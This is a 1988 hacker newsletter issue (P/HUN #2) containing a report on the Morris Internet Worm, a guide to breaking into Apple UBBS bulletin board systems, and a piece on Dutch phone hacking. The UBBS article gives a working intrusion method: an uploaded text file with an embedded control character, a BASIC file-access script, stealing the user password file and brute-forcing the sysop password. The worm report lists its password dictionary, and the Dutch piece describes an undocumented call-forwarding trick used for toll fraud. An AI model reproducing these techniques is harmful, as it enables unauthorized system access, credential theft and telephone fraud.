()---------------------------------------------------------------------------()

   P/HUN Volume 1 , Issue #2 (c)88'                  Articles 8 + Introduction

   Released : December 14th 1988                     Comments: Christmas Issue







                      --==> The Hackers Den88 <==--

                              (718)358/9209

                           "P/HUN Headquarters"

                      2600 Bulletin Board System #5

                    +-------------------------------+

                           Proudly presents....



                         -== P/HUN Issue #2 ==-

                            ----------------





                 Volume 1 , P/HUN Issue #2 - Phile #1 of 9

                 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



I am proud to say that we have been getting a lot of support from people all

over the States and also some parts of Europe like London & Holand.

Our last newsletter was definately a success even though it was our first

issue.

We at the Hackers Den88 are trying our very best to satisfy our readers.



Listed below are the boards that P/HUN Issues can regularly be found on,

besides The Hackers Den88(Home of P/HUN Newsletter) :



                        ** The Phoenix Project **

                    ** Digital Logic Data Systems **

                 ** The Central Office (2600 BBS #2) **



We are currently looking for someone who could write P/HUN World News.

This segment will contain various news and happenings around the world and

U.S ,pertaining to areas in P/H

If you think you are expeirenced enough handle the job ,let us know.

Hopefully PHUN World News will be in the next issue.



                         +++++++++++++++++++++++



I would also like to state that The Hackers Den88 is now an official

2600 Magazine Bulletin Board #5. I would to thank "The DataMaster",SysOp

of the The Central Office (2600 BBS #2) for all is help and support.



                         +++++++++++++++++++++++



If you wish to Subcribe to The 2600 Magazine:

Yearly Subscription: US & Canada -- $15 individual, $40 corporate

Overseas -- $25 individual, $55 corporate

Back Issues available for 1984,1985,1986,1987 at $25 per year, $30 overseas



Send to : 2600 MAGAZINE SUBCRIPTION DEPT.,

          P.O Box 752

          Middle Island N.Y 11953

          Telephone: (516)751/2600



                         +++++++++++++++++++++++



As you aleardy know P/HUN is always on the look out for good articles that

deal in DEFEATING COMPUTER SECURITY,TELECOMMUNICATIONS,AMATURE RADIO,CABLE

DESCRAMBLING & PYROTECHNICS.

If anyone has the whole list of ANACs for all NPAs ,upload it for the

forecoming issue.

Many have requested articles on Moblile Phreaking,DataNet,Latest with ISDN,

information pertaining to 5ESS and Adjunct Frames.

Mobile Phreaking seems to be at the top of our list.



If you wish to submit to P/HUN please contact me at the Hackers Den88 .

If your article proves to be intresting it will be published in our forecoming

newsletter.



The next issue will be out somewhere in February of 1989.

Have a wonderfull Christmas with best wishes for the Newyear from all of us at

the Hackers Den88.



Well here it is P/HUN Issue #2 ....  Enjoy!





                                                       Red Knight

                                                 SysOp of The Hackers Den88

                                                      P/HUN! TSAN!



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Table of Contents:

------------------



#     Description                                   Writer        Size

--    ------------------------------------------    --------      ----

1  -  Introduction & Contents                       Red Knight    4K

2  -  A report on the InterNet Worm                 Bob Page      16K

3  -  Defeating Security of Apple's UBBS            Evil Mind     8K

4  -  Hacking in Holand & its Numbering Method      Rop & Key     10K

5  -  Things to do with 'Third Party Payphones'     The Jedi      10K

6  -  An Indepth Guide in Hacking the Unix + BNU    Red Knight    42K

7  -  Guide to "The Pick Operating System"          Mr. Slippery  13K

8  -  A Novice's Guide to Hacking - 1989 Edition    The Mentor    42K

9  -  Telephone-Controlled Tape Starter             NY Hacker     5K



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=               Volume 1 , P/HUN Issue #2 , Phile #2 of 9                     =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                     A REPORT ON THE INTERNET WORM



                               Bob Page

                          University of Lowell

                      Computer Science Department



                            November 7, 1988



     [Because of the many misquotes the media have been giving,

     this report is Copyright (c) Bob Page, all rights reserved.

     Permission is granted to republish this ONLY if you republish

     it in its entirety.]



Here's the scoop on the "Internet Worm".  Actually it's not a virus -

a virus is a piece of code that adds itself to other programs,

including operating systems.  It cannot run independently, but rather

requires that its "host" program be run to activate it.  As such, it

has a clear analog to biologic viruses -- those viruses are not

considered live, but they invade host cells and take them over, making

them produce new viruses.



A worm is a program that can run by itself and can propagate a fully

working version of itself to other machines.  As such, what was loosed

on the Internet was clearly a worm.



This data was collected through an emergency mailing list set up by

Gene Spafford at Purdue University, for administrators of major

Internet sites - some of the text is included verbatim from that list.

Mail was heavy since the formation of the list; it continues to be on

Monday afternoon - I get at least 2-3 messages every hour.  It's

possible that some of this information is incomplete, but I thought

you'd like to know what I know so far.



The basic object of the worm is to get a shell on another machine so

it can reproduce further.  There are three ways it attacks: sendmail,

fingerd, and rsh/rexec.





THE SENDMAIL ATTACK:



In the sendmail attack, the worm opens a TCP connection to another

machine's sendmail (the SMTP port), invokes debug mode, and sends a

RCPT TO that requests its data be piped through a shell.  That data, a

shell script (first-stage bootstrap) creates a temporary second-stage

bootstrap file called x$$,l1.c (where '$$' is the current process ID).

This is a small (40-line) C program.



The first-stage bootstrap compiles this program with the local cc and

executes it with arguments giving the Internet hostid/socket/password

of where it just came from.  The second-stage bootstrap (the compiled

C program) sucks over two object files, x$$,vax.o and x$$,sun3.o from

the attacking host.  It has an array for 20 file names (presumably for

20 different machines), but only two (vax and sun) were compiled in to

this code.  It then figures out whether it's running under BSD or

SunOS and links the appropriate file against the C library to produce

an executable program called /usr/tmp/sh - so it looks like the Bourne

shell to anyone who looked there.





THE FINGERD ATTACK:



In the fingerd attack, it tries to infiltrate systems via a bug in

fingerd, the finger daemon.  Apparently this is where most of its

success was (not in sendmail, as was originally reported).  When

fingerd is connected to, it reads its arguments from a pipe, but

doesn't limit how much it reads.  If it reads more than the internal

512-byte buffer allowed, it writes past the end of its stack.  After

the stack is a command to be executed ("/usr/ucb/finger") that

actually does the work.  On a VAX, the worm knew how much further from

the stack it had to clobber to get to this command, which it replaced

with the command "/bin/sh" (the bourne shell).  So instead of the

finger command being executed, a shell was started with no arguments.

Since this is run in the context of the finger daemon, stdin and

stdout are connected to the network socket, and all the files were

sucked over just like the shell that sendmail provided.





THE RSH/REXEC ATTACK:



The third way it tried to get into systems was via the .rhosts and

/etc/hosts.equiv files to determine 'trusted' hosts where it might be

able to migrate to.  To use the .rhosts feature, it needed to actually

get into people's accounts - since the worm was not running as root

(it was running as daemon) it had to figure out people's passwords.

To do this, it went through the /etc/passwd file, trying to guess

passwords.  It tried combinations of: the username, the last, first,

last+first, nick names (from the GECOS field), and a list of special

"popular" passwords:



aaa          cornelius        guntis      noxious    simon

academia      couscous        hacker      nutrition    simple

aerobics      creation        hamlet      nyquist    singer

airplane      creosote        handily      oceanography    single

albany          cretin        happening      ocelot    smile

albatross     daemon        harmony      olivetti    smiles

albert          dancer        harold      olivia    smooch

alex          daniel        harvey      oracle    smother

alexander     danny        hebrides      orca        snatch

algebra          dave        heinlein      orwell    snoopy

aliases          december        hello      osiris    soap

alphabet      defoe        help      outlaw    socrates

ama          deluge        herbert      oxford    sossina

amorphous     desperate        hiawatha      pacific    sparrows

analog          develop        hibernia      painless    spit

anchor          dieter        honey      pakistan    spring

andromache    digital        horse      pam        springer

animals          discovery        horus      papers    squires

answer          disney        hutchins      password    strangle

anthropogenic dog        imbroglio      patricia    stratford

anvils          drought        imperial      penguin    stuttgart

anything      duncan        include      peoria    subway

aria          eager        ingres      percolate    success

ariadne          easier        inna      persimmon    summer

arrow          edges        innocuous      persona    super

arthur          edinburgh        irishman      pete        superstage

athena          edwin        isis      peter        support

atmosphere    edwina        japan      philip    supported

aztecs          egghead        jessica      phoenix    surfer

azure          eiderdown        jester      pierre    suzanne

bacchus          eileen        jixian      pizza        swearer

bailey          einstein        johnny      plover    symmetry

banana          elephant        joseph      plymouth    tangerine

bananas          elizabeth        joshua      polynomial    tape

bandit          ellen        judith      pondering    target

banks          emerald        juggle      pork        tarragon

barber          engine        julia      poster    taylor

baritone      engineer        kathleen      praise    telephone

bass          enterprise    kermit      precious    temptation

bassoon          enzyme        kernel      prelude    thailand

batman          ersatz        kirkland      prince    tiger

beater          establish        knight      princeton    toggle

beauty          estate        ladle      protect    tomato

beethoven     euclid        lambda      protozoa    topography

beloved          evelyn        lamination      pumpkin    tortoise

benz          extension        larkin      puneet    toyota

beowulf          fairway        larry      puppet    trails

berkeley      felicia        lazarus      rabbit    trivial

berliner      fender        lebesgue      rachmaninoff    trombone

beryl          fermat        lee          rainbow    tubas

beverly          fidelity        leland      raindrop    tuttle

bicameral     finite        leroy      raleigh    umesh

bob          fishers        lewis      random    unhappy

brenda          flakes        light      rascal    unicorn

brian          float        lisa      really    unknown

bridget          flower        louis      rebecca    urchin

broadway      flowers        lynne      remote    utility

bumbling      foolproof        macintosh      rick        vasant

burgess          football        mack      ripple    vertigo

campanile     foresight        maggot      robotics    vicky

cantor          format        magic      rochester    village

cardinal      forsythe        malcolm      rolex        virginia

carmen          fourier        mark      romano    warren

carolina      fred        markus      ronald    water

caroline      friend        marty      rosebud    weenie

cascades      frighten        marvin      rosemary    whatnot

castle          fun        master      roses        whiting

cat          fungible        maurice      ruben        whitney

cayuga          gabriel        mellon      rules        will

celtics          gardner        merlin      ruth        william

cerulean      garfield        mets      sal        williamsburg

change          gauss        michael      saxon        willie

charles          george        michelle      scamper    winston

charming      gertrude        mike      scheme    wisconsin

charon          ginger        minimum      scott        wizard

chester          glacier        minsky      scotty    wombat

cigar          gnu        moguls      secret    woodwind

classic          golfer        moose      sensor    wormwood

clusters      gorgeous        morley      serenity    yaco

coffee          gorges        mozart      sharks    yang

coke          gosling        nancy      sharon    yellowstone

collins          gouge        napoleon      sheffield    yosemite

commrades     graham        nepenthe      sheldon    zap

computer      gryphon        ness      shiva        zimmerman

condo          guest        network      shivers

cookie          guitar        newton      shuttle

cooper          gumption        next      signature



[I wouldn't have picked some of these as "popular" passwords, but

then again, I'm not a worm writer.  What do I know?]



When everything else fails, it opens /usr/dict/words and tries every

word in the dictionary.  It is pretty successful in finding passwords,

as most people don't choose them very well.  Once it gets into

someone's account, it looks for a .rhosts file and does an 'rsh'

and/or 'rexec' to another host, it sucks over the necessary files into

/usr/tmp and runs /usr/tmp/sh to start all over again.





Between these three methods of attack (sendmail, fingerd, .rhosts)

it was able to spread very quickly.





THE WORM ITSELF:



The 'sh' program is the actual worm.  When it starts up it clobbers

its argv array so a 'ps' will not show its name.  It opens all its

necessary files, then unlinks (deletes) them so they can't be found

(since it has them open, however, it can still access the contents).

It then tries to infect as many other hosts as possible - when it

sucessfully connects to one host, it forks a child to continue the

infection while the parent keeps on trying new hosts.



One of the things it does before it attacks a host is connect to the

telnet port and immediately close it.  Thus, "telnetd: ttloop: peer

died" in /usr/adm/messages means the worm attempted an attack.



The worm's role in life is to reproduce - nothing more.  To do that it

needs to find other hosts.  It does a 'netstat -r -n' to find local

routes to other hosts & networks, looks in /etc/hosts, and uses the

yellow pages distributed hosts file if it's available.  Any time it

finds a host, it tries to infect it through one of the three methods,

see above.  Once it finds a local network (like 129.63.nn.nn for

ulowell) it sequentially tries every address in that range.



If the system crashes or is rebooted, most system boot procedures

clear /tmp and /usr/tmp as a matter of course, erasing any evidence.

However, sendmail log files show mail coming in from user /dev/null

for user /bin/sed, which is a tipoff that the worm entered.



Each time the worm is started, there is a 1/15 chance (it calls

random()) that it sends a single byte to ernie.berkeley.edu on some

magic port, apparently to act as some kind of monitoring mechanism.





THE CRACKDOWN:



Three main 'swat' teams from Berkeley, MIT and Purdue found copies of

the VAX code (the .o files had all the symbols intact with somewhat

meaningful names) and disassembled it into about 3000 lines of C.  The

BSD development team poked fun at the code, even going so far to point

out bugs in the code and supplying source patches for it!  They have

not released the actual source code, however, and refuse to do so.

That could change - there are a number of people who want to see the

code.



Portions of the code appear incomplete, as if the program development

was not yet finished.  For example, it knows the offset needed to

break the BSD fingerd, but doesn't know the correct offset for Sun's

fingerd (which causes it to dump core); it also doesn't erase its

tracks as cleverly as it might; and so on.



The worm uses a variable called 'pleasequit' but doesn't correctly

initialize it, so some folks added a module called _worm.o to the C

library, which is produced from:

        int pleasequit = -1;

the fact that this value is set to -1 will cause it to exit after one

iteration.



The close scrutiny of the code also turned up comments on the

programmer's style.  Verbatim from someone at MIT:

    From disassembling the code, it looks like the programmer

    is really anally retentive about checking return codes,

    and, in addition, prefers to use array indexing instead of

    pointers to walk through arrays.



Anyone who looks at the binary will not see any embedded strings -

they are XOR'ed with 81 (hex).  That's how the shell commands are

imbedded.  The "obvious" passwords are stored with their high bit set.



Although it spreads very fast, it is somewhat slowed down by the fact

that it drives the load average up on the machine - this is due to all

the encryptions going on, and the large number of incoming worms from

other machines.



[Initially, the fastest defense against the worm is is to create a

directory called /usr/tmp/sh.  The script that creates /usr/tmp/sh

from one of the .o files checks to see if /usr/tmp/sh exists, but not

to see if it's a directory.  This fix is known as 'the condom'.]





NOW WHAT?



None of the ULowell machines were hit by the worm.  When BBN staffers

found their systems infected, they cut themselves off from all other

hosts.  Since our connection to the Internet is through BBN, we were

cut off as well.  Before we were cut off, I received mail about the

sendmail problem and installed a patch to disable the feature the worm

uses to get in through sendmail.  I had made local modifications to

fingerd which changed the offsets, so any attempt to scribble over the

stack would probably have ended up in a core dump.



Most Internet systems running 4.3BSD or SunOS have installed the

necessary patches to close the holes and have rejoined the Internet.

As you would expect, there is a renewed interest in system/network

security, finding and plugging holes, and speculation over what

will happen to the worm's creator.



If you haven't read or watched the news, various log files have named

the responsible person as Robert Morris Jr., a 23-year old doctoral

student at Cornell.  His father is head of the National Computer

Security Center, the NSA's public effort in computer security, and has

lectured widely on security aspects of UNIX.



Associates of the student claim the worm was a 'mistake' - that he

intended to unleash it but it was not supposed to move so quickly or

spread so much.  His goal (from what I understand) was to have a

program 'live' within the Internet.  If the reports that he intended

it to spread slowly are true, then it's possible that the bytes sent

to ernie.berkeley.edu were intended to monitor the spread of the

worm.  Some news reports mentioned that he panicked when, via some

"monitoring mechanism" he saw how fast it had propagated.



A source inside DEC reports that although the worm didn't make much

progress there, it was sighted on several machines that wouldn't be

on its normal propagation path, i.e. not gateways and not on the same

subnet.  These machines are not reachable from the outside.  Morris

was a summer intern at DEC in '87.  He might have included names or

addresses he remembered as targets for infesting hidden internal

networks.  Most of the DEC machines in question belong to the group he

worked in.



The final word has not been written - I don't think the FBI have even

met with this guy yet.  It will be interesting to see what happens.







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=                Volume 1 , P/HUN Issue #2 , Phile #3 of 9                    =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                    Defeating Security on Apple's UBBS

                    ----------------------------------

                       Writen by Evil Mind of CTG

                       Computer Terrorists Guild





Introduction

-------------



   Hello fellow hackers are phreakers, I'm here to tell you all about Apple's

UBBS.  This is a nice little program that will make any Apple computer with a

modem have the ability to be a bbs.  It can be on any storage device, from

a 5.25 disk, to a chain of hard drives.  I doubt any hackers or phreakers are

using this program, because everyone (in Apple's world) uses GBBS.  So, let's

get down to business.



   For flexability, UBBS has been written in BASIC.  For our convience, hackers

with a knowledge of universial basic (or better yet, knowledge of Apple BASIC)

will have a good time.  The only catch is, the control-c (break basic programs)

is screened out by a ml routine before it hits basic.  But, no need to fear,

discussion on hacking it is later.



   When a sysop first uses a UBBS program, the sysop must run the program

SYSGEN.... which is for System Generation, the "Creator Program" for the

board.  Questions are name of board, sysop's name, bullitin's names,

and other things needed before the next program is run: LOGON... which will

then put the computer in answer mode.



   Let's say some guy calls a few days later.  The LOGON program will then

display a bbs title, then something like "Enter your name or press <RETURN>

for NEW."  So, this guy does a <RETURN> for new... questions are asked, and

then the sysop validates him.  Normal procedure like any other bbs program.



Hacking it

-----------



   Once in the system, get access to the <F>eatures section which hopefully

has a up/downloading section.  If they give a lame excuse of not giving

it to you because of an IBM, lie in the validation part, and say you own an

Apple.  First, upload some text file... like a list of bbs numbers.  If the

file needs to be validated by the sysop before further access from the public,

then it will be hard to hack it out. (Explained later.)



   Now, at least you have some access... hopefully the u/d ratio is 1:1 or

better.  So, upload two more files!



File #1

--------



   This is the most important file in the hacking process.  This file should

contain the following or simular to it: (<CR>=<RETURN>) This is a TEXT file.



------------------------------------------------------------------------------



THIS IS A POEM<CR>

<CR>

<Control-D>CAT<CR>

RAT<CR>

DOG<CR>

PAT<CR>

<CR>

BY MR. WALTHER<CR>



------------------------------------------------------------------------------



File explained:



Well, the control D is needed.  If you can't enter it from your word processor,

then enter "DCAT" and go in with a disk editor and change character D into

hex $04, which is a control-d to Apple. Normally, control-d is within programs,

used to run disk commands from basic.  When viewed, it will catalog the

current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie"

mode.  Also, when downloading this file, view it, don't use Xmodem. But upload

file #2 with it, so you can hack in one call and delete your tracks.





File #2

--------



   Well, this program is supposed to be basic, but since a lot of hackers I

know have IBM's, I'll make it hackable from both Apple and IBM.  Make the

following TEXT, that's right, text file.



------------------------------------------------------------------------------



10 ONERR GOTO 1000

20 HOME

30 PRINT "A DISK PREFIXER"

40 PRINT

50 PRINT "<P>REFIX   <C>ATALOG   <V>IEW   <D>ELETE   <R>UN"

60 INPUT A$

70 IF A$<>"P" OR A$<>"p" THEN 100

80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS"

90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40

100 IF A$<>"C" OR A$<>"c" THEN 120

110 PRINT CHR$(4);"CATALOG": GOTO 40

120 IF A$<>"D" OR A$<>"d" THEN 150

130 PRINT "DELETE WHAT FILE?"

140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40

150 IF A$<>"R" OR A$<>"r" THEN 180

160 PRINT "RUN WHICH FILE?"

170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40

180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40

190 PRINT "VIEW WHICH FILE?"

200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$

210 ONERR GOTO 230

220 INPUT B$: PRINT B$: GOTO 220

230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000

240 GOTO 40

1000 PRINT "ERROR!": CALL -1370



------------------------------------------------------------------------------



   Upload the files.  When asked about file #2, say it's a TXT file.



   Now view file #1.  It will catalog (or DIR) the disk,

and then be in a "zombie" state.  This is when the basic thinks the disk is

still being read, and is really stuck, for you to enter things.  To clear that

up, the INPUT command is used both for keyboard input, or in the correct

conditions (that UBBS uses), disk input from text files!



   If you can't see it yet, press a control-D and a disk command.  The real

intention is to run file #2, which will do the hacking.  But, File#2 and

File#1 might be in a different directory than the transfer program.  Use

these commands: (With a control-D before them)



CAT             to see what is on the disk.



Example:



]CAT



/HARD1        (PREFIX NAME)



PROGRAMS          DIR   10-NOV-88  2

PRODOS            SYS   06-APR-81  32

BASIC.SYSTEM      SYS   07-APR-81  20

BASIC.PROGRAMS    BAS   10-NOV-88  5

ML.PROGRAMS       BIN   10-NOV-88  7

READ.ME           TXT   10-NOV-88  10



   In which case, should explore further with a



]PREFIX /HARD1/PROGRAMS

]CAT



/HARD1/PROGRAMS



LOGON             BAS   10-APR-84  54

SYSOP             BAS   10-APR-84  34



   Once you explore enough to fine your files, do an:



]EXEC file#2



   Replace "file#2" with whatever you named the second file.

Note: exploring will take a long time, because you might need to find some

other things to intrest you, like the logon program (which can be in another

directory). When exploring in the zombie state, the computer sometimes zaps out

back into normal running mode.  Re-download and start where you left off.



Then it'll go:



A DISK PREFIXER



<P>REFIX   <C>ATALOG   <D>ELETE   <V>IEW   <R>UN

?



   Then enter the desired one, in this case, "P" and press enter.

Here's how to work them:



Examples: from basic



]PREFIX /HARD1/FILES   (to get to the diectory /hard1/files)

]PREFIX /HARD1/        (to get back to /hard1)

]PREFIX                (tells you what the current prefix is)

]CATALOG               (DIR a disk for you)

]RUN LOGON             (Go back to LOGON program)



   View is a different thing, and can't be done from basic.  In this case,

choose "V" for view, (beforehand, find the userinfo file, a text file.)

And when it goes:



VIEW WHICH FILE?

?



type in a pathname.... example:



VIEW WHICH FILE?

?/HARD1/BBS/USERINFO.DATA



and it'll show the passwords.  Explore!  There are a lot of things to do.  One

last word before you finish, the sysop is 001, find his password, log in as

him, then make all your accounts from there (because he validates and creates

accounts.)



   The form for UBBS passwords are:



NNNCCCC   where N is a number, and C is a character.

example: 001SYSOP.  Also, 001SYSOP is the default password? (I'm not sure, but

I think it is.)  Try it on a new board and see if the sysop didn't change it

yet.



So if your victim board doesn't have the requirements, just use a password

scanner and try out 001AAAA   001AAAB and all, and eventually you can get it

in a matter of weeks.  (No lowercase or control characters are accepted by

UBBS.)



All in a nutshell, here's another example:



------------------------------------------------------------------------------



Welcome to a UBBS system.



Enter name or press return for new users

XXXXXXX

checking password.

Hello Mr. Bill, today is 00/00/00



news for today:



               This is a new board and hope ya enjoy it,

                Your sysop, Tom Hacket.



No Email waiting

Email>Quit



Main level:

B/A/G/J/N/F/Q/Help

>Features



loading xfer, please wait...



Xfer command>

Upload



choose protocol:



X>modem

T>ext



Xmodem





(upload files)



70 blocks recieved....



Information:



What is file#1's type:

TXT

What is file#2's type:

TXT



Thank you.





Xfer command>

Download



Download what file?

TEST.UPLOAD  (file#1)



THIS IS A POEM



/HARD1/ONLINE



CALLER.LOG   06   TXT

USER.INFO    65   TXT

LOGON        45   BAS

SYSGEN       65   BAS

TEST.UPLOAD  02   TXT

PREFIXER     03   TXT

LEECHES      02   TXT





(Zombie state) (control-D)EXEC PREFIXER(return)



A DISK PREFIXER



<C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX

?B



NOT A COMMAND!



<C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX

?V

VIEW WHICH FILE?

?USER.INFO



(list of passwords)



<C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX

?R

RUN WHICH FILE?

?LOGON



(Automatically hangs up, you re-call, then log in as sysop, and make another

account with good access.)









=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=                 Volume 1 , P/HUN Issue #2 , Phile #4 of 9                   =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                   Hacking In Holand & The Numbering Plan

                   --------------------------------------

                            By: Rop and The Key





    In Holland, hacking started out late. The first real hacks were

done in the early eighties. Among these hacks was the 'RIVM hack',

hacking the computer of the dutch health-inspection (FDA). Because

even patient names were listed here this got a lot of publicity.



    Around 1984/1985 the movement grew rapidly because of the movie

'Wargames' and publications in the "Volkskrant", the country's major

left-wing newspaper. It was around these days two students hacked the

'008 computer', the directory-assistance system, owned by our local

Ma-Bell clone, the PTT. Because hackers had access to a lot of

unlisted phone numbers this was front-page news in all of Europe.



Shortly after this hack, Jan Jacobs published the book 'kraken en

computers' (hacking and computers), about the uprise of the hacker

movement in The Netherlands. Jan Jacobs is also a free-lance reporter

for the 'Volkskrant' which explains their scoops on major hacking

events. In those days, he himself was a hacker.



Things remained relatively quiet, although the CCC kept scaring

everybody with their marvelous hacks all over the world over the

packet-network. X-25 hacking in Holland is relatively new, not because

the net was not there, but because it was still to easy to use the

telephone. Only recently dutch hackers discover that the X-25 net

offers them the opportunity to make low-cost global hacks.



Another group had sprung into life in the early eighties, phreaks.

These phreaks concentrated on mobile phones however, because our ATF1

(car-phone 1) system is as leak as a basket. Using a CBM-64 or other

simple hardware and an FM-tranceiver, every weirdo could make free

calls all over the world. This lasted until there were so many illegal

car-phones that the costs began affecting the total PTT turnover.



The PTT then made it impossible for car-phone users to make

international phone calls automatically and told their international

operators to check for fraud carefully. By that time all the phreaks

were rich from selling their technique 'to friends only', and bored

stiff, because the PTT had taken their toy away. There was a new

system, ATF2 (compatible to the scandinavian NMT system), but this was

to complicated (in those days) to hack (considdering these people were

not computer minds but mainly high-frequency experts).



The phreaks met the hackers and they decided their goels were the

same.



The PTT phreaked out when the world found out that some of the leading

hackers had switched to phreaking. When Personal Computer Magazine

published an article about phreaks making free calls all over the

world through an old exchange in Denmark (which could be reached free

of charge), all hell broke loose. The magazine contained our list of

frequencies for the CCITT-4 system, so suddenly everybody was a

phonephreak. The free lines to Denmark were rerouted, some other gaps

were closed, but no action could be taken against the phone phreaks

(The Key and me among others), because no phone-fraud legislation

exists in Holland. Can you imagine what it's like to live in a country

that has NO phone-fraud laws?



Since then things have cooled down (there are only about 40 real

active hackers in the entire country, so things tend to get quiet

every once in a while), but as soon as anything happens, we'll let you

know.





                                    ROP & The Key





Leave a message for ROP GONGGRIJP at NEABBS, Europe's biggest BBS, and

I will give you THIS (The Hacker Information System) privs as soon as

possible. +31 20 717666, all speeds/standards.

---------------------------------------------------------------------------

- AND NOW PART TWO OF THE DUTCH SYSTEM, BY ROP & THE KEY OF NEABBS !!!!!!!-

---------------------------------------------------------------------------



NUMBERING PLAN



The dutch phone system has a numbering plan that is far more

complicated than the american phone system. Telephone numbers can be

divided in several classes:



0XX-YYYYYY[Y]    Larger cities. XX is random (very large cities

                 have a 0 as their last digit).



0XXYY-ZZZZ[Z]    Smaller towns. XX is the number of the district

                 (note: these numbers cannot be handed out to

                 bigger cities). Holland has some 20 districts,

                 amsterdam is 29. (the Amsterdam city code is 020)



00X

001X             Special numbers, see below.



    06-0XXX         Free numbers

    06-0XXXXXX      Free numbers

        06-022XXXX      International Free Numbers, connect to foreign

                        companies etc. (we even have a number for

                        making AT&T calling card calls for free,

                        06-0229111). When all european borders

                        disappear in 1992, this group is expected to

                        grow rapidly!

    06-3XXXXXXXX    Special high cost numbers, mainly phone-sex (the

                    owner gets 2.5 $ct./min, the PTT gets 22.5. This

                    makes the PTT the country's biggest pimp)

    06-4XXX         Free numbers, explosive. (This means a lot of

                    traffic at one time, TV-shows and the like)

    06-4XXXXXX      Free numbers, explosive.

    06-51XXXXX      Beepers (sorry, paging equipment)

    06-52XXXXXX     ATF2 (mobile phone system, NMT compatible)

    06-524XXXXX     ATF1, West and Middle Netherlands

    06-525XXXXX     ATF1, North Netherlands

    06-526XXXXX     ATF1, South Netherlands

    06-8XXXXXXXX    Split costs, the caller pays a portion of the

                    costs, the called party pays as well (80%+80%=100%

                    according to phone company arithmatic)

    06-9XXXXXXXX    Special high cost numbers, no phone-sex



09-.......          International access. For the States i.e., we dial

                    09-1XXXYYYZZZZ. Our country code is 31.





SPECIAL NUMBERS

---------------



002              Speaking clock

003              Weather

004              PTT-customer service (contradictio in terminis)

005              was the mobilophone network (pre-carphone mobile

                 operator service), now tape telling callers that this

                 service no longer exists.

006X             Used by PTT for mechanics to call in. 0069 always

                 plays a tape listing the home-phone number of the

                 mechanic on duty for that region.

007              PTT-repairs (uses pigeons for further internal

                 communication, judged by their working speed)

008              Directory assistance

009              Was message service, for telex and other services,

                 their new number is 06-0409. tape.

0010             Was national operator, now 06-0410. tape.

0011             Once planned as a countrywide emergency number. Once

                 they got to installing it they had the 06 exchange,

                 which was newer and better, so the discussion started

                 again...... tape now

0012             Telex number info

0013             Telex repairs

0014

0015

0016             Was international operator, now 06-0410. tape.

0017             Post office customer service

0018             Was international inquiries, now 06-0418. tape

0019             Dead





TARIFFS

-------



A toll-impulse costs 7.5 $ct, impulses are 50 Hz/48V pulses on both

lines (tip and ring, called A and B here), so can only be detected

relative to the ground potential. On modern exchanges you have to pay

for these pulses, as well as for the DTMF-facility (sound familiar?).



Calls cost more in the day time (0800/1800 hrs), than on weekdays.



Within your low-tariff zone (about 30 miles around your home), it's

one tick every 5 minutes, or once every 10 minutes at night, outside

of that zone one tick every 1.5 minutes, 45 seconds at night.



International calls from Holland are terribly expensive, USA costs

$2.00 a minute, but there's a lot of countries that cost over $3.50 a

minute.





SPECIAL THINGS (everybody has some)

--------------



030-555555    for conference calls (operator only, she calls you back,

              so phreaks are out of the question). The do-it-yourself

              conference has not been invented here (yet).

06-0101       All sorts of special services, addresses from the phone

              book (costs $1.25 to get an address!) etc. Also national

              collect calls ($2.50 bonus for PTT, $1/min)



*XXX*.....#   Some exchanges have this feature. It means you redirect

              all calls for your phone to the given number (dots). PTT

              offers this service for a lot of money as *21*....#, but

              this is different. With the *XXX*...# feature the phone

              doesn't ring on the redirected phone (with the *21

              feature it does three times before forwarding the call).

              The *XXX*....# feature is a non documented feature, even

              at the PTT not many people have heard of it. Alas, not

              many exchanges feature it. The XXX can easily be found

              because if you're one digit off the system reacts with a

              nonexistent-tone (three tones, each one higher than the

              preceeding one), so there's only 30 possibilities.



Things like call-waiting, or even specified bills do not exist here

(yet). When they come, they'll be expensive, that's for sure.



PTT POLICY

----------



The company has a monopoly on all telecom facilities that expires next

year (1989). Up till now we could not even buy our telephone sets

somewhere else (legally). People finally realised this was ridiculous

and decided to privatise the PTT Telecommunications department. The

PTT remains in charge of the network however, and they can continue

charging ridiculous amounts for it. The state monopoly is enabling the

phone company to suck money from our pockets.





HACKER POLICY

-------------



Redirect phone lines to other numbers (they don't even know it exists,

we do it all the time, to receive free collect calls). This trick

courtesy of The KEY.



Route calls through other countries to make things cheaper. (Spain was

our favourite before they closed it off).



Generally screw 'em......







                                            ROP & THE KEY





You can reach me on NEABBS, Europe's biggest BBS, +31 20 717666, all

speeds/standards. Send a message to me, ROP GONGGRIJP, cosysop of THIS

hacker board (The Hacker Information System).







